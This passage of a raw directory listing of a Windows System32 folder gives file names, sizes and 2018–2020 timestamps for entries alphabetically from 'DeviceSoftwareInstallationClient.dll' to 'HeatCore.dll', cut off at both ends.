DeviceSoftwareInstallationClient.dll +F 106496 09/15/2018 07:28:55 DeviceUpdateAgent.dll +F 13312 
09/15/2018 07:29:14 DeviceUxRes.dll +F 638480 03/07/2020 00:53:51 devinv.dll +F 145622 09/15/2018 07:28:56 devmgmt.msc +F 827392 09/15/2018 07:28:56 devmgr.dll +F 13091 09/15/2018 07:28:56 DevModeRunAsUserConfig.msc +F 156512 03/07/2020 00:53:28 devobj.dll +F 123904 09/15/2018 07:28:30 DevPropMgr.dll +F 34816 03/07/2020 00:53:35 DevQueryBroker.dll +F 59392 09/15/2018 07:28:46 devrtl.dll +F 45568 09/15/2018 07:29:14 dfdts.dll +F 52736 09/15/2018 07:29:14 DFDWiz.exe +F 576512 03/07/2020 00:54:11 dfrgui.exe +F 64512 09/15/2018 07:28:46 dfscli.dll +F 1571328 09/15/2018 07:29:33 dfshim.dll +F 66560 09/15/2018 07:28:55 DfsShlEx.dll +F 81920 09/15/2018 09:09:59 dggpext.dll +F 14848 09/15/2018 07:29:16 dhcpcmonitor.dll +F 368640 03/07/2020 00:53:26 dhcpcore.dll +F 281600 03/07/2020 00:53:26 dhcpcore6.dll +F 91648 09/15/2018 07:28:46 dhcpcsvc.dll +F 68096 09/15/2018 07:28:46 dhcpcsvc6.dll +F 217088 09/15/2018 07:29:14 dhcpsapi.dll +F 1053696 09/15/2018 07:29:22 DiagCpl.dll +F 99840 09/15/2018 07:28:30 DiagnosticInvoker.dll +F 326144 03/07/2020 00:53:58 DiagnosticLogCSP.dll +F 1329664 09/15/2018 07:29:14 diagperf.dll +F 212480 03/07/2020 00:54:17 DiagSvc.dll +D 0 03/07/2020 00:55:54 DiagSvcs +F 3581440 03/07/2020 00:53:29 diagtrack.dll +F 240128 09/15/2018 07:29:16 dialclient.dll +F 37376 09/15/2018 07:29:22 dialer.exe +F 180224 09/15/2018 07:29:16 dialserver.dll +F 492032 03/07/2020 00:53:49 DictationManager.dll +F 348160 09/15/2018 07:28:56 difxapi.dll +F 43520 09/15/2018 07:29:14 dimsjob.dll +F 47104 09/15/2018 07:29:14 dimsroam.dll +F 168448 09/15/2018 07:29:14 dinput.dll +F 220160 09/15/2018 07:29:14 dinput8.dll +F 25088 09/15/2018 07:28:38 Direct2DDesktop.dll +F 605576 03/07/2020 00:53:37 directmanipulation.dll +F 1720320 03/07/2020 00:53:37 directml.dll +F 289792 03/07/2020 00:54:08 discan.dll +F 47682 09/15/2018 07:28:45 diskmgmt.msc +F 155648 09/15/2018 07:28:45 diskpart.exe +F 25088 09/15/2018 07:29:20 diskperf.exe +F 337920 09/15/2018 07:28:45 diskraid.exe +F 
83978 09/15/2018 07:28:38 DiskSnapshot.conf +F 92160 03/07/2020 00:53:28 DiskSnapshot.exe +D 0 03/07/2020 00:55:54 Dism +F 290616 03/07/2020 00:53:57 Dism.exe +F 1006392 03/07/2020 00:53:57 DismApi.dll +F 372224 09/15/2018 07:28:34 DispBroker.dll +F 124928 09/15/2018 07:28:32 dispdiag.exe +F 29184 09/15/2018 07:28:57 dispex.dll +F 154112 09/15/2018 07:29:14 Display.dll +F 171520 03/07/2020 00:53:39 DisplayManager.dll +F 1924976 03/07/2020 00:54:11 DisplaySwitch.exe +F 602 09/15/2018 07:28:22 DisplaySystemToastIcon.contrast-white.png +F 346 09/15/2018 07:28:22 DisplaySystemToastIcon.png +F 15360 09/15/2018 07:28:22 djctq.rs +F 73728 09/15/2018 07:28:56 djoin.exe +F 21304 09/15/2018 07:28:45 dllhost.exe +F 12800 09/15/2018 07:28:42 dllhst3g.exe +F 291840 09/15/2018 09:10:00 dlnashext.dll +F 10752 09/15/2018 07:28:51 DMAlertListener.ProxyStub.dll +F 61952 09/15/2018 07:28:24 DmApiSetExtImplDesktop.dll +F 2560 09/15/2018 07:28:50 DMAppsRes.dll +F 167936 09/15/2018 07:28:50 dmcertinst.exe +F 38400 09/15/2018 07:28:51 dmcfghost.exe +F 108544 09/15/2018 07:28:51 dmcfgutils.dll +F 120320 09/15/2018 07:28:25 dmclient.exe +F 157536 03/07/2020 00:53:57 dmcmnutils.dll +F 14848 09/15/2018 07:28:52 dmcommandlineutils.dll +F 167424 03/07/2020 00:53:58 dmcsps.dll +F 458240 09/15/2018 07:28:45 dmdlgs.dll +F 267264 09/15/2018 07:28:44 dmdskmgr.dll +F 1064960 09/15/2018 07:28:45 dmdskres.dll +F 2560 09/15/2018 07:28:45 dmdskres2.dll +F 553472 03/07/2020 00:53:58 dmenrollengine.dll +F 303104 03/07/2020 00:53:58 dmenterprisediagnostics.dll +F 56320 09/15/2018 07:28:45 dmintf.dll +F 14848 09/15/2018 07:28:50 dmiso8601utils.dll +F 49664 09/15/2018 07:29:16 dmloader.dll +F 32256 09/15/2018 07:28:22 DmNotificationBroker.exe +F 52736 09/15/2018 07:28:56 dmocx.dll +F 30720 09/15/2018 07:28:50 dmoleaututils.dll +F 34304 09/15/2018 07:28:50 DmOmaCpMo.exe +F 33792 09/15/2018 07:28:50 dmprocessxmlfiltered.dll +F 18432 09/15/2018 07:28:50 dmpushproxy.dll +F 188416 03/07/2020 00:53:58 
DMPushRouterCore.dll +F 2136064 09/15/2018 07:28:34 DMRCDecoder.dll +F 516472 09/15/2018 09:09:59 DMRServer.dll +F 123392 09/15/2018 07:29:16 dmsynth.dll +F 133120 09/15/2018 07:29:16 dmusic.dll +F 26624 09/15/2018 07:28:45 dmutil.dll +F 176128 03/07/2020 00:53:53 dmvdsitf.dll +F 139264 09/15/2018 07:28:45 dmview.ocx +F 58368 09/15/2018 07:28:51 dmwappushsvc.dll +F 152064 09/15/2018 07:28:23 dmwmicsp.dll +F 97792 09/15/2018 07:28:32 dmxmlhelputils.dll +F 799784 03/07/2020 00:53:26 dnsapi.dll +F 32768 09/15/2018 07:28:51 dnscacheugc.exe +F 134656 03/07/2020 00:54:11 dnscmmc.dll +F 9728 09/15/2018 07:28:56 dnsext.dll +F 108544 09/15/2018 07:29:24 dnshc.dll +F 349696 03/07/2020 00:53:26 dnsrslvr.dll +F 143872 09/15/2018 07:29:25 Docking.VirtualInput.dll +F 14336 09/15/2018 07:28:50 DockInterface.ProxyStub.dll +F 41984 09/15/2018 07:28:58 docprop.dll +F 77312 09/15/2018 07:29:21 DocumentPerformanceEvents.dll +F 756736 03/07/2020 00:53:31 DolbyHrtfEnc.dll +F 119296 03/07/2020 00:53:31 DolbyMATEnc.dll +F 392704 03/07/2020 00:53:27 domgmt.dll +F 267776 09/15/2018 07:29:14 dosettings.dll +F 18944 09/15/2018 07:29:16 doskey.exe +F 1566720 03/07/2020 00:53:27 dosvc.dll +F 92160 09/15/2018 07:28:25 dot3api.dll +F 72192 09/15/2018 07:28:24 dot3cfg.dll +F 29184 09/15/2018 07:28:26 Dot3Conn.dll +F 57344 09/15/2018 07:28:25 dot3dlg.dll +F 58368 09/15/2018 07:28:24 dot3gpclnt.dll +F 278016 09/15/2018 07:28:26 dot3gpui.dll +F 74752 09/15/2018 07:29:23 dot3hc.dll +F 180736 09/15/2018 07:28:25 dot3mm.dll +F 104448 09/15/2018 07:28:25 dot3msm.dll +F 265728 09/15/2018 07:28:25 dot3svc.dll +F 317440 09/15/2018 07:28:25 dot3ui.dll +D 0 09/15/2018 06:09:29 downlevel +F 15872 09/15/2018 07:28:46 dpapi.dll +F 76800 09/15/2018 07:28:57 dpapimig.exe +F 56320 09/15/2018 07:29:14 dpapiprovider.dll +F 208896 03/07/2020 00:53:26 dpapisrv.dll +F 79360 09/15/2018 07:29:14 DpiScaling.exe +F 10240 09/15/2018 07:29:16 dpnaddr.dll +F 10240 09/15/2018 07:29:16 dpnathlp.dll +F 10240 09/15/2018 07:29:16 
dpnet.dll +F 10240 09/15/2018 07:29:16 dpnhpast.dll +F 10240 09/15/2018 07:29:16 dpnhupnp.dll +F 10240 09/15/2018 07:29:16 dpnlobby.dll +F 10240 09/15/2018 07:29:16 dpnsvr.exe +F 169984 09/15/2018 07:29:24 dps.dll +F 657408 09/15/2018 07:28:50 dpx.dll +F 46080 09/15/2018 07:29:14 DragDropExperienceDataExchangeDelegated.dll +F 82944 09/15/2018 07:28:56 driverquery.exe +D 0 03/07/2020 10:33:17 drivers +D 0 09/15/2018 07:33:50 DriverState +D 0 03/29/2020 11:25:00 DriverStore +F 25600 09/15/2018 07:29:23 drprov.dll +F 279552 09/15/2018 07:29:24 drt.dll +F 315 03/07/2020 00:53:28 DrtmAuth1.bin +F 315 03/07/2020 00:53:28 DrtmAuth2.bin +F 315 03/07/2020 00:53:28 DrtmAuth3.bin +F 315 03/07/2020 00:53:28 DrtmAuth4.bin +F 315 03/07/2020 00:53:28 DrtmAuth5.bin +F 315 03/07/2020 00:53:28 DrtmAuth6.bin +F 315 03/07/2020 00:53:28 DrtmAuth7.bin +F 315 03/07/2020 00:53:28 DrtmAuth8.bin +F 69120 09/15/2018 07:29:24 drtprov.dll +F 54784 09/15/2018 07:29:24 drttransport.dll +F 78848 09/15/2018 07:28:38 drvcfg.exe +F 169984 03/07/2020 00:53:44 drvinst.exe +F 109568 03/07/2020 00:53:28 drvsetup.dll +F 1213752 03/07/2020 00:53:28 drvstore.dll +F 46080 09/15/2018 07:29:14 dsauth.dll +D 0 09/15/2018 09:07:52 dsc +F 476160 03/07/2020 00:53:24 DscCore.dll +F 200704 09/15/2018 07:29:20 DscCoreConfProv.dll +F 52152 09/15/2018 07:28:30 dsclient.dll +F 19968 09/15/2018 07:29:20 dscproxy.dll +F 26624 09/15/2018 07:29:21 DscTimer.dll +F 196096 09/15/2018 07:28:22 dsdmo.dll +F 130048 09/15/2018 07:29:14 dskquota.dll +F 226816 09/15/2018 07:29:14 dskquoui.dll +F 17920 09/15/2018 07:28:50 DsmUserTask.exe +F 593920 03/07/2020 00:53:31 dsound.dll +F 31744 09/15/2018 07:28:46 dsparse.dll +F 170496 09/15/2018 07:28:50 dsprop.dll +F 443904 09/15/2018 07:28:50 dsquery.dll +F 744448 09/15/2018 07:28:30 dsreg.dll +F 954368 09/15/2018 07:29:25 dsregcmd.exe +F 28936 09/15/2018 07:28:45 dsrole.dll +F 215943 09/15/2018 07:31:36 dssec.dat +F 58880 09/15/2018 07:29:14 dssec.dll +F 153368 09/15/2018 07:28:46 
dssenh.dll +F 164864 03/07/2020 00:53:37 dssvc.dll +F 13312 09/15/2018 07:28:30 dstokenclean.exe +F 150016 09/15/2018 07:29:16 Dsui.dll +F 686080 09/15/2018 07:28:50 dsuiext.dll +F 28160 09/15/2018 07:29:16 dswave.dll +F 37888 09/15/2018 07:28:50 dtsh.dll +F 133432 03/07/2020 00:53:31 DTUHandler.exe +F 22016 09/15/2018 07:28:20 DTUHandlerPS.dll +F 122368 09/15/2018 07:28:39 DuCsps.dll +F 1761280 03/07/2020 00:53:57 dui70.dll +F 581120 09/15/2018 07:28:50 duser.dll +F 48128 09/15/2018 07:29:13 dusmapi.dll +F 359424 03/07/2020 00:54:08 dusmsvc.dll +F 37376 09/15/2018 07:29:13 dusmtask.exe +F 11776 09/15/2018 07:29:22 dvdplay.exe +F 50176 03/07/2020 00:53:53 dwm.exe +F 168488 03/07/2020 00:53:53 dwmapi.dll +F 3490304 03/07/2020 00:53:53 dwmcore.dll +F 62464 09/15/2018 07:28:45 dwmghost.dll +F 52024 09/15/2018 07:28:44 dwminit.dll +F 130560 03/07/2020 00:53:53 dwmredir.dll +F 3082752 03/07/2020 00:53:39 DWrite.dll +F 217088 03/07/2020 00:54:15 DWWIN.EXE +F 370176 03/07/2020 00:54:11 dxdiag.exe +F 374784 09/15/2018 07:29:16 dxdiagn.dll +F 780408 03/07/2020 00:53:39 dxgi.dll +F 48128 09/15/2018 07:28:32 dxgiadaptercache.exe +F 20992 09/15/2018 07:28:51 dxgwdi.dll +F 1268224 09/15/2018 07:28:32 dxilconv.dll +F 7168 09/15/2018 09:08:37 dxmasf.dll +F 467968 09/15/2018 07:29:14 DXP.dll +F 37888 09/15/2018 07:29:14 dxpps.dll +F 308224 09/15/2018 07:29:14 Dxpserver.exe +F 1432064 09/15/2018 07:29:14 DxpTaskSync.dll +F 472576 09/15/2018 07:29:16 dxtmsft.dll +F 282112 09/15/2018 07:29:16 dxtrans.dll +F 128296 09/15/2018 07:28:32 dxva2.dll +F 745552 09/15/2018 07:28:22 DynamicLong.bin +F 515152 09/15/2018 07:28:22 DynamicMedium.bin +F 323152 09/15/2018 07:28:22 DynamicShort.bin +F 56320 09/15/2018 07:28:50 dynamoapi.dll +F 50176 09/15/2018 07:28:38 EAMProgressHandler.dll +F 13824 09/15/2018 07:28:23 Eap3Host.exe +F 320000 09/15/2018 07:28:22 eapp3hst.dll +F 239616 09/15/2018 07:28:22 eappcfg.dll +F 312832 09/15/2018 07:28:51 eappcfgui.dll +F 105984 09/15/2018 07:28:22 
eappgnui.dll +F 302080 09/15/2018 07:28:22 eapphost.dll +F 72704 09/15/2018 07:28:22 eappprxy.dll +F 52224 09/15/2018 07:28:57 eapprovp.dll +F 145920 09/15/2018 07:28:50 eapsimextdesktop.dll +F 110080 09/15/2018 07:28:23 eapsvc.dll +F 23040 09/15/2018 07:28:51 easconsent.dll +F 320000 09/15/2018 07:28:43 EaseOfAccessDialog.exe +F 77160 09/15/2018 07:29:14 easinvoker.exe +F 29184 09/15/2018 07:29:14 easinvoker.proxystub.dll +F 64000 03/07/2020 00:54:28 EASPolicyManagerBrokerHost.exe +F 14848 09/14/2018 18:02:00 EasPolicyManagerBrokerPS.dll +F 177152 09/15/2018 07:29:14 easwrt.dll +F 2150912 03/07/2020 00:54:15 edgeangle.dll +F 4050432 03/07/2020 00:53:40 EdgeContent.dll +F 26807296 03/07/2020 00:54:15 edgehtml.dll +F 72 03/07/2020 00:53:21 edgehtmlpluginpolicy.bin +F 449024 03/07/2020 00:53:57 edgeIso.dll +F 912384 03/07/2020 00:54:15 EdgeManager.dll +F 87040 09/15/2018 07:28:32 EditBufferTestHook.dll +F 188928 09/15/2018 07:28:45 EditionUpgradeHelper.dll +F 240376 03/07/2020 00:53:52 EditionUpgradeManagerObj.dll +F 138240 09/15/2018 07:28:50 edpauditapi.dll +F 162816 03/07/2020 00:54:09 EDPCleanup.exe +F 164864 03/07/2020 00:54:09 edpcsp.dll +F 61952 09/15/2018 07:28:50 edpnotify.exe +F 71680 09/15/2018 07:28:50 edptask.dll +F 259584 09/15/2018 07:28:50 edputil.dll +F 97280 03/07/2020 00:54:17 EduPrintProv.exe +F 417792 03/07/2020 00:53:31 eeprov.dll +F 57344 09/15/2018 07:28:20 eeutil.dll +F 128512 09/15/2018 07:28:51 efsadu.dll +F 1125392 03/07/2020 00:53:57 efscore.dll +F 69632 09/15/2018 07:28:51 efsext.dll +F 108544 03/07/2020 00:53:57 efslsaext.dll +F 79872 09/15/2018 07:28:50 efssvc.dll +F 14336 09/15/2018 07:28:51 efsui.exe +F 45056 09/15/2018 07:28:52 efsutil.dll +F 788480 03/07/2020 00:53:46 efswrt.dll +F 132096 09/15/2018 07:29:14 EhStorAPI.dll +F 129024 09/15/2018 07:29:14 EhStorAuthn.exe +F 112128 09/15/2018 07:29:14 EhStorPwdMgr.dll +F 207872 09/15/2018 07:28:50 EhStorShell.dll +D 0 09/15/2018 09:09:27 el-GR +F 225792 09/15/2018 07:29:18 els.dll +F 
77824 09/15/2018 07:28:52 ELSCore.dll +F 239104 09/15/2018 07:29:18 elshyph.dll +F 701952 09/15/2018 07:28:53 elslad.dll +F 29696 09/15/2018 07:28:52 elsTrans.dll +F 1129472 09/15/2018 07:28:34 EmailApis.dll +F 168960 09/15/2018 07:28:30 embeddedmodesvc.dll +F 47616 09/15/2018 07:28:30 embeddedmodesvcapi.dll +F 57344 09/15/2018 07:28:22 EmojiDS.dll +D 0 09/15/2018 09:10:11 en +D 0 03/07/2020 00:55:54 en-GB +D 0 03/07/2020 00:55:54 en-US +F 26624 09/15/2018 07:29:21 encapi.dll +F 99688 09/15/2018 07:28:46 EncDump.dll +F 647168 09/15/2018 07:29:14 energy.dll +F 175104 03/07/2020 00:53:31 energyprov.dll +F 26112 09/15/2018 07:29:20 energytask.dll +F 228352 03/07/2020 00:53:58 enrollmentapi.dll +F 143360 09/15/2018 07:29:16 EnterpriseAPNCsp.dll +F 25600 09/15/2018 07:28:36 EnterpriseAppMgmtClient.dll +F 506880 03/07/2020 00:53:43 EnterpriseAppMgmtSvc.dll +F 91648 09/15/2018 09:09:59 EnterpriseAppVMgmtCSP.dll +F 1708544 03/07/2020 00:53:58 enterprisecsps.dll +F 91648 09/15/2018 07:29:16 EnterpriseDesktopAppMgmtCSP.dll +F 19968 09/15/2018 07:28:50 enterpriseetw.dll +F 190464 09/15/2018 07:28:38 EnterpriseModernAppMgmtCSP.dll +F 84480 03/07/2020 00:53:58 enterpriseresourcemanager.dll +F 79872 09/15/2018 07:29:19 eqossnap.dll +F 209920 09/15/2018 07:28:30 ErrorDetails.dll +F 46592 09/15/2018 07:28:30 ErrorDetailsCore.dll +D 0 09/15/2018 09:09:27 es-ES +D 0 09/15/2018 09:09:27 es-MX +F 490496 09/15/2018 07:28:42 es.dll +F 20480 09/15/2018 07:28:50 EsdSip.dll +F 3269632 03/07/2020 00:53:28 esent.dll +F 65024 09/15/2018 07:29:16 esentprf.dll +F 375296 03/07/2020 00:54:11 esentutl.exe +F 37376 09/15/2018 07:29:18 esevss.dll +F 142848 09/15/2018 07:28:42 eShims.dll +F 33792 09/15/2018 07:28:22 esrb.rs +D 0 09/15/2018 09:09:27 et-EE +F 184832 09/15/2018 07:28:36 EthernetMediaManager.dll +F 154112 09/15/2018 07:28:34 ETWCoreUIComponentsResources.dll +F 78848 09/15/2018 07:28:36 ETWESEProviderResources.dll +F 48128 09/15/2018 07:28:50 EtwRundown.dll +F 356352 09/15/2018 07:29:16 
eudcedit.exe +F 144896 09/15/2018 07:29:25 eUICCsCSP.dll +F 78848 09/15/2018 07:28:29 EventAggregation.dll +F 17408 09/15/2018 07:29:22 eventcls.dll +F 42496 09/15/2018 07:29:23 eventcreate.exe +F 17935 09/15/2018 07:29:16 EventViewer_EventDetails.xsl +F 83968 09/15/2018 07:29:16 eventvwr.exe +F 145127 09/15/2018 07:29:16 eventvwr.msc +F 751696 09/15/2018 09:10:04 evr.dll +F 314072 03/07/2020 00:53:37 ExecModelClient.dll +F 83456 09/15/2018 07:28:30 execmodelproxy.dll +F 66048 09/15/2018 07:28:51 expand.exe +F 4736512 03/07/2020 00:53:46 ExplorerFrame.dll +F 263168 09/15/2018 07:28:36 ExSMime.dll +F 34304 09/15/2018 07:28:44 extrac32.exe +F 24576 09/15/2018 07:28:36 ExtrasXmlParser.dll +D 0 09/15/2018 09:07:52 F12 +F 8704 09/15/2018 07:28:53 f3ahvoas.dll +F 604672 03/07/2020 00:54:08 facecredentialprovider.dll +F 99840 09/15/2018 07:28:55 Family.Authentication.dll +F 98816 09/15/2018 07:28:55 Family.Cache.dll +F 147456 09/15/2018 07:28:56 Family.Client.dll +F 260096 09/15/2018 07:28:56 Family.SyncEngine.dll +F 14336 09/15/2018 07:28:42 FamilySafetyExt.dll +F 451120 03/07/2020 00:53:29 Faultrep.dll +F 31232 09/15/2018 07:28:26 FaxPrinterInstaller.dll +F 24576 09/15/2018 07:29:13 fc.exe +F 154624 03/07/2020 00:54:30 fcon.dll +F 71168 03/07/2020 00:53:51 fdBth.dll +F 14336 09/15/2018 07:28:42 fdBthProxy.dll +F 35328 09/15/2018 07:28:50 FdDevQuery.dll +F 158208 09/15/2018 07:28:45 fde.dll +F 158720 09/15/2018 07:28:44 fdeploy.dll +F 21504 09/15/2018 07:28:51 fdPHost.dll +F 59904 09/15/2018 07:28:50 fdPnp.dll +F 289280 09/15/2018 07:28:56 fdprint.dll +F 68096 09/15/2018 07:28:51 fdProxy.dll +F 35328 09/15/2018 07:28:50 FDResPub.dll +F 108032 03/07/2020 00:54:08 fdSSDP.dll +F 110080 09/15/2018 07:28:24 fdWCN.dll +F 30208 09/15/2018 07:28:51 fdWNet.dll +F 152064 03/07/2020 00:54:09 fdWSD.dll +F 44257 09/15/2018 07:28:26 FeatureToastBulldogImg.png +F 246272 03/07/2020 00:53:57 feclient.dll +F 68608 09/15/2018 07:28:30 ffbroker.dll +F 290304 09/15/2018 07:29:24 fhcat.dll +F 
430592 09/15/2018 07:29:24 fhcfg.dll +F 54272 09/15/2018 07:29:24 fhcleanup.dll +F 335872 09/15/2018 07:29:24 fhcpl.dll +F 241664 09/15/2018 07:29:24 fhengine.dll +F 72704 09/15/2018 07:29:24 fhevents.dll +F 65024 09/15/2018 07:29:24 fhlisten.dll +F 139776 09/15/2018 07:29:24 fhmanagew.exe +F 437760 09/15/2018 07:29:24 fhsettingsprovider.dll +F 153600 09/15/2018 07:29:24 fhshl.dll +F 79872 09/15/2018 07:29:24 fhsrchapi.dll +F 69120 09/15/2018 07:29:24 fhsrchph.dll +F 120832 09/15/2018 07:29:24 fhsvc.dll +F 29696 09/15/2018 07:29:24 fhsvcctl.dll +F 59392 09/15/2018 07:29:24 fhtask.dll +F 132608 09/15/2018 07:29:24 fhuxadapter.dll +F 16896 09/15/2018 07:29:24 fhuxapi.dll +F 45568 09/15/2018 07:29:24 fhuxcommon.dll +F 78336 03/07/2020 00:54:17 fhuxgraphics.dll +F 902656 09/15/2018 07:29:24 fhuxpresentation.dll +D 0 09/15/2018 09:09:27 fi-FI +F 218112 09/15/2018 07:28:34 fidocredprov.dll +F 33792 09/15/2018 07:28:34 FileAppxStreamingDataSource.dll +F 250880 03/07/2020 00:54:17 FileHistory.exe +F 556544 09/15/2018 07:28:56 filemgmt.dll +F 166400 03/07/2020 00:53:28 FilterDS.dll +F 17408 09/15/2018 07:29:16 find.exe +F 66560 09/15/2018 07:28:57 findnetprinters.dll +F 35328 09/15/2018 07:29:14 findstr.exe +F 15872 09/15/2018 07:29:14 finger.exe +F 119296 09/15/2018 07:29:14 fingerprintcredential.dll +F 7168 09/15/2018 07:29:18 Firewall.cpl +F 552448 03/07/2020 00:53:40 FirewallAPI.dll +F 936960 09/15/2018 07:29:16 FirewallControlPanel.dll +F 21504 09/15/2018 07:28:44 fixmapi.exe +F 889344 03/07/2020 00:53:32 FlightSettings.dll +F 32008 09/15/2018 07:28:46 fltLib.dll +F 30720 09/15/2018 07:28:46 fltMC.exe +F 2725888 09/15/2018 07:28:22 FluencyDS.dll +F 75776 09/15/2018 07:29:23 fmapi.dll +F 59704 09/15/2018 07:28:38 fmifs.dll +F 200704 09/15/2018 07:28:50 fms.dll +F 303120 03/30/2020 07:41:49 FNTCACHE.DAT +F 1904128 03/07/2020 00:53:39 FntCache.dll +F 47104 09/15/2018 07:29:21 fodhelper.exe +F 112128 09/15/2018 07:29:21 Fondue.exe +F 808272 03/07/2020 00:53:55 
fontdrvhost.exe +F 974848 03/07/2020 00:53:34 fontext.dll +F 60416 09/15/2018 07:28:50 FontGlyphAnimator.dll +F 19456 09/15/2018 07:28:50 fontgroupsoverride.dll +F 138240 09/15/2018 07:28:32 FontProvider.dll +F 125440 03/07/2020 00:53:55 fontsub.dll +F 121344 09/15/2018 07:28:24 fontview.exe +F 49152 09/15/2018 07:29:14 forfiles.exe +F 38400 09/15/2018 07:28:43 format.com +F 41472 09/15/2018 07:28:22 fpb.rs +F 123392 09/15/2018 07:28:55 fphc.dll +D 0 03/07/2020 00:55:54 fr-CA +D 0 03/07/2020 00:55:54 fr-FR +F 254976 09/15/2018 07:28:39 framedyn.dll +F 303616 09/15/2018 07:28:25 framedynos.dll +F 701440 03/07/2020 00:54:16 FrameServer.dll +F 84480 09/15/2018 07:28:44 frprov.dll +F 16896 09/15/2018 07:29:23 fsavailux.exe +F 316416 03/07/2020 00:54:16 FSClient.dll +F 99400 09/15/2018 07:29:21 FsIso.exe +F 144909 09/15/2018 07:28:56 fsmgmt.msc +F 146944 09/15/2018 07:28:42 fsquirt.exe +F 183808 03/07/2020 00:54:08 fsutil.exe +F 32256 09/15/2018 07:28:44 fsutilext.dll +F 67584 09/15/2018 07:29:23 fthsvc.dll +F 58880 09/15/2018 07:29:23 ftp.exe +F 153600 09/15/2018 07:28:50 fundisc.dll +F 898048 03/07/2020 00:54:25 fveapi.dll +F 370688 03/07/2020 00:54:25 fveapibase.dll +F 27136 09/15/2018 09:10:03 fvecerts.dll +F 331776 03/07/2020 00:54:25 fvecpl.dll +F 174592 09/15/2018 09:09:55 fvenotify.exe +F 163328 09/15/2018 09:09:56 fveprompt.exe +F 69120 03/07/2020 00:54:25 fveskybackup.dll +F 309760 03/07/2020 00:54:25 fveui.dll +F 815616 03/07/2020 00:54:25 fvewiz.dll +F 159744 09/15/2018 07:28:34 fwbase.dll +F 55296 09/15/2018 07:29:19 fwcfg.dll +F 91648 09/15/2018 07:28:36 fwmdmcsp.dll +F 234496 09/15/2018 07:28:34 fwpolicyiomgr.dll +F 470016 03/07/2020 00:53:40 FWPUCLNT.DLL +F 99328 09/15/2018 07:28:50 FwRemoteSvr.dll +F 281600 09/15/2018 07:29:56 FXSAPI.dll +F 90112 09/15/2018 07:29:56 FXSCOM.dll +F 650752 09/15/2018 07:29:56 FXSCOMEX.dll +F 415232 09/15/2018 07:29:47 FXSCOMPOSE.dll +F 35328 09/15/2018 07:29:47 FXSCOMPOSERES.dll +F 234496 09/15/2018 07:29:47 FXSCOVER.exe 
+F 8192 09/15/2018 07:29:56 FXSEVENT.dll +F 46592 09/15/2018 07:29:56 FXSMON.dll +F 925696 09/15/2018 07:29:56 FXSRESM.dll +F 77824 09/15/2018 07:29:56 FXSROUTE.dll +F 857088 09/15/2018 07:29:56 FXSST.dll +F 636928 09/15/2018 07:29:56 FXSSVC.exe +F 254976 09/15/2018 07:29:56 FXST30.dll +F 412160 09/15/2018 07:29:56 FXSTIFF.dll +D 0 03/07/2020 10:34:53 FxsTmp +F 19456 09/15/2018 07:29:56 FXSUNATD.exe +F 181248 09/15/2018 07:29:47 FXSUTILITY.dll +F 59904 09/15/2018 07:29:22 g711codc.ax +F 306688 09/15/2018 07:29:13 GameBarPresenceWriter.exe +F 13824 09/15/2018 07:29:13 GameBarPresenceWriter.proxy.dll +F 12288 09/15/2018 07:29:13 GameChatOverlayExt.dll +F 128000 09/15/2018 07:28:30 GameChatTranscription.dll +F 28672 09/15/2018 07:28:30 gamemode.dll +F 1292800 03/07/2020 00:54:08 GamePanel.exe +F 27136 09/15/2018 07:29:13 GamePanelExternalHook.dll +F 1480 09/15/2018 07:28:22 GameSystemToastIcon.contrast-white.png +F 1132 09/15/2018 07:28:22 GameSystemToastIcon.png +F 25088 09/15/2018 07:29:16 gameux.dll +F 163840 09/15/2018 07:28:30 gamingtcui.dll +F 88781 09/15/2018 07:29:23 gatherNetworkInfo.vbs +F 24006 09/15/2018 07:29:22 gb2312.uce +F 132096 09/15/2018 07:29:14 gcdef.dll +F 157024 03/07/2020 00:53:39 gdi32.dll +F 1668752 03/07/2020 00:53:57 gdi32full.dll +F 1702400 03/07/2020 00:53:57 GdiPlus.dll +F 811536 03/07/2020 00:53:50 generaltel.dll +F 664168 09/15/2018 07:28:58 GenValObj.exe +F 51712 09/15/2018 07:28:36 Geocommon.dll +F 470528 09/15/2018 07:28:34 Geolocation.dll +F 85504 09/15/2018 07:28:56 getmac.exe +F 11264 09/15/2018 07:29:22 getuname.dll +F 509440 09/15/2018 07:29:20 glmf32.dll +F 317440 09/15/2018 07:28:30 GlobCollationHost.dll +F 146944 03/07/2020 00:53:30 globinputhost.dll +F 163328 09/15/2018 07:29:21 glu32.dll +F 38400 09/15/2018 07:28:46 gmsaclient.dll +F 130112 09/15/2018 07:28:50 gpapi.dll +F 1089536 09/15/2018 07:29:18 gpedit.dll +F 147439 09/15/2018 09:10:05 gpedit.msc +F 694784 09/15/2018 09:10:00 gpprefcl.dll +F 39424 09/15/2018 07:28:25 
gpprnext.dll +F 224256 09/15/2018 07:29:16 gpresult.exe +F 50688 09/15/2018 09:09:59 gpscript.dll +F 45568 09/15/2018 09:09:59 gpscript.exe +F 1280000 03/07/2020 00:53:57 gpsvc.dll +F 26112 09/15/2018 07:28:51 gptext.dll +F 29184 09/15/2018 07:29:16 gpupdate.exe +F 138752 03/07/2020 00:53:40 GraphicsCapture.dll +F 93696 09/15/2018 07:28:32 GraphicsPerfSvc.dll +F 19456 09/15/2018 07:28:22 grb.rs +F 75264 03/07/2020 00:54:18 Groupinghc.dll +D 0 03/29/2020 10:22:28 GroupPolicy +D 0 09/15/2018 07:33:50 GroupPolicyUsers +F 51200 09/15/2018 07:29:23 grpconv.exe +F 591376 03/07/2020 00:53:43 hal.dll +F 20968 09/15/2018 07:28:18 HalExtIntcLpioDMA.dll +F 18920 09/15/2018 07:28:18 HalExtPL080.dll +F 1243 09/15/2018 07:28:22 HandwritingSystemToastIcon.contrast-white.png +F 912 09/15/2018 07:28:22 HandwritingSystemToastIcon.png +F 93184 09/15/2018 07:28:24 hascsp.dll +F 110592 03/07/2020 00:53:31 HashtagDS.dll +F 82944 09/15/2018 07:28:45 hbaapi.dll +F 61952 09/15/2018 07:28:50 hcproviders.dll +F 299560 09/15/2018 07:29:14 HdcpHandler.dll +F 382464 09/15/2018 07:28:56 hdwwiz.cpl +F 67584 09/15/2018 07:28:56 hdwwiz.exe +D 0 09/15/2018 09:09:27 he-IL +F 1460 09/15/2018 07:28:22 HeadphoneSystemToastIcon.contrast-white.png +F 1114 09/15/2018 07:28:22 HeadphoneSystemToastIcon.png +F 1560 09/15/2018 07:28:22 HeadsetSystemToastIcon.contrast-white.png +F 1196 09/15/2018 07:28:22 HeadsetSystemToastIcon.png +F 1832 09/15/2018 07:28:22 HealthSystemToastIcon.contrast-white.png +F 1660 09/15/2018 07:28:22 HealthSystemToastIcon.png +F 262656 03/07/2020 00:53:40 HeatCore.dll +F 